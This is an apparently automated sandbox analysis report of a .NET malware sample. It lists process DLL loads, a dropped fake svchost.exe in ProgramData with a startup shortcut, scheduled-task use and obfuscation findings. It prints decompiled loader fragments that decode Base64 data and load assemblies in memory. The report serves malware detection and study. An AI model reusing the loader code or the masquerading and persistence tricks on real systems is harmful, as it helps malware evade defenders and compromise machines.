Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\svchost.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: svchost.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\svchost.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: a9YMw44iQq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: a9YMw44iQq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Bf13MrTgh7zf0ag.Lh8GzADz2j4ZQkS,Bf13MrTgh7zf0ag._4nfLLiUt18bOWVH,Bf13MrTgh7zf0ag.HomGWmyDc17u8TP,Bf13MrTgh7zf0ag.HP1tDCpCJvlUuRV,Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd._8OlI7FzhlSYcSzFdJ2FkA6c4Rio0oxPq()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[2],Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.LUYVjXWCttsIfBLLOpt644yOSP0XH1xl(Convert.FromBase64String(x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Bf13MrTgh7zf0ag.Lh8GzADz2j4ZQkS,Bf13MrTgh7zf0ag._4nfLLiUt18bOWVH,Bf13MrTgh7zf0ag.HomGWmyDc17u8TP,Bf13MrTgh7zf0ag.HP1tDCpCJvlUuRV,Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd._8OlI7FzhlSYcSzFdJ2FkA6c4Rio0oxPq()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[2],Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.LUYVjXWCttsIfBLLOpt644yOSP0XH1xl(Convert.FromBase64String(x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { x3EX8lfA5Ha54rtNPGbXy8v1pYCK1McwisfMsWm6rQA2ly4[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: tzIwe855hkZVfy7N3N16Mzc4y7JQSTMeDbxwLesPqgFr2De System.AppDomain.Load(byte[])
Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: iV7TY5oCiEBfS9wg8yushOLiETmekrC5O6iKh5hV5Po09VW System.AppDomain.Load(byte[])
Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: iV7TY5oCiEBfS9wg8yushOLiETmekrC5O6iKh5hV5Po09VW
Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: tzIwe855hkZVfy7N3N16Mzc4y7JQSTMeDbxwLesPqgFr2De System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: iV7TY5oCiEBfS9wg8yushOLiETmekrC5O6iKh5hV5Po09VW System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	.Net Code: iV7TY5oCiEBfS9wg8yushOLiETmekrC5O6iKh5hV5Po09VW

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Code function: 0_2_00007FFD3488BEF5 push eax; retf	0_2_00007FFD3488BF2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3478D2A5 pushad ; iretd	2_2_00007FFD3478D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348A09D8 push E85D5F5Dh; ret	2_2_00007FFD348A09F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD3479D2A5 pushad ; iretd	5_2_00007FFD3479D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD3477D2A5 pushad ; iretd	8_2_00007FFD3477D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD3478D2A5 pushad ; iretd	11_2_00007FFD3478D2A6
Source: C:\ProgramData\svchost.exe	Code function: 16_2_00007FFD348B00BD pushad ; iretd	16_2_00007FFD348B00C1
Source: C:\ProgramData\svchost.exe	Code function: 17_2_00007FFD348B00BD pushad ; iretd	17_2_00007FFD348B00C1
Source: C:\ProgramData\svchost.exe	Code function: 19_2_00007FFD348B00BD pushad ; iretd	19_2_00007FFD348B00C1

Source: a9YMw44iQq.exe, zMKBkijdWFRYxIMXTaYx0kSiNqDvrPtC.cs	High entropy of concatenated method names: 'Lw8UB3IX5V1miaVjgD0tGALkI7UAlT8n', 'OfylzWNZBWuGK4jjHivwl5H0mHAPXv4h', 'al0GQ3oCXiyfe55qzZHr3j44azBU7khh', 'itrXAtZGog8ACyWsXPIOPXfZr88v5xDnyI95fSPY861tZc6G2oif8t7f8', '_0uwu8i1OCOnhUsXXl7EAjMgGL8GwLyYdCe7Hg1g0Tgp2C6qrhdVY5DoNZ', 'XTMpKqRmWLZtcLcZTwyCb1EbOpWRhW4ONA3IoMrcIVlhVpyQQpF12btiR', 'kjIdsWc0D4cfpch8Jaje2CAkTfF93koQCidYMiVvLeMc8EfwzEogNzT6i', '_95KhGU6BlcEWK2gR2BUHcMW6VQxFbyH9exAZlWpR0fMVnQtE7Bf8v7eCl', 'sHpO1jo7wHXzZEyuROtGVqIxqebLOb9FatJd9ACfW6T1cPNLo2F0HU40F', 'bpThypL9MgwhTeocE5VtNF5OSeud3XT558LyC2odonZT5R32bBgGyVLaf'
Source: a9YMw44iQq.exe, Bf13MrTgh7zf0ag.cs	High entropy of concatenated method names: 'QxiOb7WzUjUksbZSLhXv2GQEq0ed1KbKWsn15zE8FvYBkwZcwpGeP9GvMuYMu29r2O9vrGQNPknvT7shY5YJ5y58v3udkXQh2', 'DIeaGU8ZZH3COVVfMDmEBnzWz2DfYpfxTt7xBTMl4oWtk8abrUHg1d1PO9SO4eW7IOHNT5tqEBV6VXuuBOgnWQkSlVfi0Iejd', 'C4hs2L7cZjbI5QKlQFWB0B4s1YlQaR1TjaHnMvuDwmrYEjRUSiRt6sLLPR85cDi45maXNlzqG8wNvw1yCy3puoAxgRp2fGPYg', 'qIIMLIiqtFvBW3G0gCm7bNtk5cM9cNctA5k2RaYcrDD2zVqqqfWZmaYFbZB1LHGxWJvKXlVBT1QoGtZpryxezEmVT3wOPOpaE'
Source: a9YMw44iQq.exe, JaFabquuELSuh5D.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'jXg1ZrABHfC9wKJq5J9yq4PzeKc2fHEBvF3xzf3XLpcVX0EM63qZR4RDltfCyOEn9', 'f7FdaLZok1L2wzlzJ0NBM6ZptNK1Vy7kmhh2D0jE125yNdDY7bJOJ1WvxWrOM4IjG', 'ZdZ4TZHXmcPA0JlpxHJuZi9dKbjAPWaZvpCIEXNmF6QOTx7ewwApY5yzt7gZY0zKf', '_76aUG2KXWXlLFEQoKiJEidfhImp69uTu4rxYR7SrxYztzKMW2dLj1IjsN4w7JlUSmk7pSHY4bcyr8MeuBBtyCDkzB5x6QXTsb'
Source: a9YMw44iQq.exe, CAKqia57kooc5P6Nhx6x0okYjQzUptMk.cs	High entropy of concatenated method names: 'xBASX7lsOJPU9Cck3kZ3o0qmLTAKuKrP', 'sGti6y5kLLjB4EZ2GKrqrV0zU', 'GsE9pLcip9MzANzPi5jppj9En', 'N6Q3SCv1YsLsr7H5DlyFIeDon', 'V6mV7RWu45SpqDfgnupk8TqiR'
Source: a9YMw44iQq.exe, KTFdTAhBe0nkVRO.cs	High entropy of concatenated method names: 'Ac4uCzowotVAxeR', 'CBIihYpQadKB8KR', 'LzcKodkO0YBRvWP', 'OWqjciiKxuUIGMm', '_9xG6KQALPjaqxhT', 'veIBr5aKy0PJKi5', 'l6kAhdELfITzeJt', '_4ePiXFPx09SA1Vv', 'LVyky0svxDcPkam', 'XkNC0OhUGP0IEKK'
Source: a9YMw44iQq.exe, xeujlJtakKMAZOjK0ur1WybEECxkXkut0zpG8ZNNqdLn0AX.cs	High entropy of concatenated method names: '_5aithjmI9LoLLPCiBILSlDH2d0kCQKXrMaEE5WJnq8Tv7Qp', 'MM7LW2HKoAitYgsdpjEATIqjAb0mwW0BBlvYMkhE7P10poq', 'QAbhGR8dNrSBTMQK0Yqav3jjG5ysRg32lWFoSxLIPma5gYP', '_0wUqk1OaVerqBQX3Y4EoWNEL1Gl2waveV0V6Gg77S9aATZP', 'Qdwp8hUnVeraABh1MLfyU5mz3arAdmAdd1aCcEk2Tl8TJDv', 'FZ2QI9XpgmmMWz11hK1DdH2zT62STcMbsDyZy4pm6rmtl3V', 'ACWqANoKGPn3bKLHCSH40rEahGuzJT1dxGB90nSsmjjylxv', 'pX8tVB0L5xZb2vb2dxPDe1rzEaM7wuaJwTZOCpk0aNdrtBw', 'fjhBRY1HMysdHfZcKmMXulYG8GDoyl12', 'McPQuVJNZQbtu65AyEQVTybL4WCB5cLo'
Source: a9YMw44iQq.exe, 7G7PfuLETnOvbfIE7xucZO8XNTqvLqOJlbqtNQJY3lKmGbm.cs	High entropy of concatenated method names: 'DFCpCujzH36d3cngc34zOQoWzQTdK0myzc7qWpsXWNu21Jb', '_587FBEMOsxviTwCKL7yBbWITHUJ3bujt3wiySDVhRy1yxGt', 'uJohSukkbCa7xsGg2Qp44GPZQCpKe32xc2O2QcGU1Q6CEvS', 'Uq58pQq8xlhaYn5Y9Bk3mrYZu', 'Ct5qYzPDfKw8LQTboboAX4hNv', 'qwBAPgrRPhdIqDHwAhXvN1hRq', 'nxduhCDsny5h3nBj2HrQsA3c1', 'jEaCh8yFqsVsZ93zdOX0nzFV8', 'ONz3wVxNhiXm2TtIiy580HIt8', 'VZ6rHUWHhThtCv7iyZtPjrFZg'
Source: a9YMw44iQq.exe, a0V5Zu6qlCMa06Q58DDhmURzmiMHtcd8kRscBWhcnJuQRjG.cs	High entropy of concatenated method names: 'jsYQiieE5aJ2jVwkXoxTSDWNphs6FAdVea24JiK6uxKGCZb', 'jvKVB8DMwRz9tgL1u0gNFSayI', 'FiiYcV3QUeyJyPiuXtFFLojQQ', '_4QTl9xaX3tWNxWuQRadqrMU6o', '_75GUCFNKwqLz6HmYfEL0DmkY1'
Source: a9YMw44iQq.exe, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.cs	High entropy of concatenated method names: 'FMEE0DIkQDvLYM2Z4yz5Tjo5b5eLEuEI', 'jObZkjuGMhwEiPBfwOmsbOrrZXZmrCeZ', 'bk6xBVPwDLAsH9U1hF1haOabJtpvpGFf', 'IshekKslk6IjxnwmSRXRoHe4GAZv2VRl', 'GIs7dhgV0OPXyxFk6TOoHoDWhv8zemsT', 'ze8Iw4Nb7Z7m1Yb66vRbWQWrAsUFPxzJ', 'UvurS3nxIHoiBM88BrHYzPx81ufHUZkd', 'swIqkQW0BTghnqNG2wFoKjkNf068bLuM', '_2414yadJg26i5vSrWjNNjeYpa4szCoAz', 'lW6mYbJTX1vQ7vHCEMrrPebmTotc5GJY'
Source: a9YMw44iQq.exe, EzYl9iqHKPGiGyI.cs	High entropy of concatenated method names: 'aP04aVJcS3soVLg', 'jobvqCGSO8bCpy3', 'OByK2z0r02mouhE', '_4I2j7ymc4y48Bup', 'MpaJfH3REaG3a2T', 'PeHeSMfcm6QgPRH', '_06w8NyFQYcs5BnZ', 'LJVYU95Gv9cQfMq', 'jDk0XayV147rHNd', 'csYJbTrZgHGnH53'
Source: a9YMw44iQq.exe, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	High entropy of concatenated method names: 'MNtS90o1HKWpwjmtlvO903GbNTByocWwLd7yyIZn6Q4ZtXK', 'tzIwe855hkZVfy7N3N16Mzc4y7JQSTMeDbxwLesPqgFr2De', 'k2x8Jncr7poTh7SyXKLhwBvqXviBc7HReEzrmXDNeueIj4R', 'wgDXMbPi6ZUBuZgeleKoQmPFcJwxyeFiCLlifHYgdhR0kc7', 'p38ACEv6I0M4R7dcFane6uBzs7RWaUJ9l5lCftfrOLZHjWg', 'lHKkwUzolK1oj4q73uwvSeNCO9BIzUcyRC2wJ4WagDWhbfa', '_5AFeAlHwXQJYUYqjS4jFcrE5EzKlM0aFnRQpSNnCeTUN6eE', '_82o2RiaQ2aGLU4TurZxmJUMkxwaoX6pdrgWihYO1RGfhj50', 'jDnkgKOMiZiOTgqeOCX5BUDS3xxH5oN9D1nr4XpUx1AU8Rf', 'qJsGITEdu1leqjdiZJFhkC1OAKNXz9CA0lm9WH1MwNzOsHq'
Source: a9YMw44iQq.exe, lwW1zcF0pcqJbKLsstMtGHZdM9caYfdk.cs	High entropy of concatenated method names: 'l7fCYY3hc0ERgtj8l2K7qTWgPUDKEQSU', 'bS9VEFiDBIgkPYTtej3kDHMXOhc0vH1s', '_3rpjR4YrSy5LkzuZ6z3xtf0c6UG2bZn9', 'zCgKRcmv0rfANyVcOzIiznvJFtvCa578', 'YSoW1FxgADijTplK7zUzpfaDA', '_2Ps92OUWolTdyV0IUdBqYGalt', 'plj2ugHMesPs6bv2tYUVwp2QD', '_2sjEZEKIzfsvSQGXaY0jAyQhN', 'ewIb0YUwF52UsD1qEVkA5tgsF', 'oGza4w5ImtYazv7CV4rdJUC9v'
Source: svchost.exe.0.dr, zMKBkijdWFRYxIMXTaYx0kSiNqDvrPtC.cs	High entropy of concatenated method names: 'Lw8UB3IX5V1miaVjgD0tGALkI7UAlT8n', 'OfylzWNZBWuGK4jjHivwl5H0mHAPXv4h', 'al0GQ3oCXiyfe55qzZHr3j44azBU7khh', 'itrXAtZGog8ACyWsXPIOPXfZr88v5xDnyI95fSPY861tZc6G2oif8t7f8', '_0uwu8i1OCOnhUsXXl7EAjMgGL8GwLyYdCe7Hg1g0Tgp2C6qrhdVY5DoNZ', 'XTMpKqRmWLZtcLcZTwyCb1EbOpWRhW4ONA3IoMrcIVlhVpyQQpF12btiR', 'kjIdsWc0D4cfpch8Jaje2CAkTfF93koQCidYMiVvLeMc8EfwzEogNzT6i', '_95KhGU6BlcEWK2gR2BUHcMW6VQxFbyH9exAZlWpR0fMVnQtE7Bf8v7eCl', 'sHpO1jo7wHXzZEyuROtGVqIxqebLOb9FatJd9ACfW6T1cPNLo2F0HU40F', 'bpThypL9MgwhTeocE5VtNF5OSeud3XT558LyC2odonZT5R32bBgGyVLaf'
Source: svchost.exe.0.dr, Bf13MrTgh7zf0ag.cs	High entropy of concatenated method names: 'QxiOb7WzUjUksbZSLhXv2GQEq0ed1KbKWsn15zE8FvYBkwZcwpGeP9GvMuYMu29r2O9vrGQNPknvT7shY5YJ5y58v3udkXQh2', 'DIeaGU8ZZH3COVVfMDmEBnzWz2DfYpfxTt7xBTMl4oWtk8abrUHg1d1PO9SO4eW7IOHNT5tqEBV6VXuuBOgnWQkSlVfi0Iejd', 'C4hs2L7cZjbI5QKlQFWB0B4s1YlQaR1TjaHnMvuDwmrYEjRUSiRt6sLLPR85cDi45maXNlzqG8wNvw1yCy3puoAxgRp2fGPYg', 'qIIMLIiqtFvBW3G0gCm7bNtk5cM9cNctA5k2RaYcrDD2zVqqqfWZmaYFbZB1LHGxWJvKXlVBT1QoGtZpryxezEmVT3wOPOpaE'
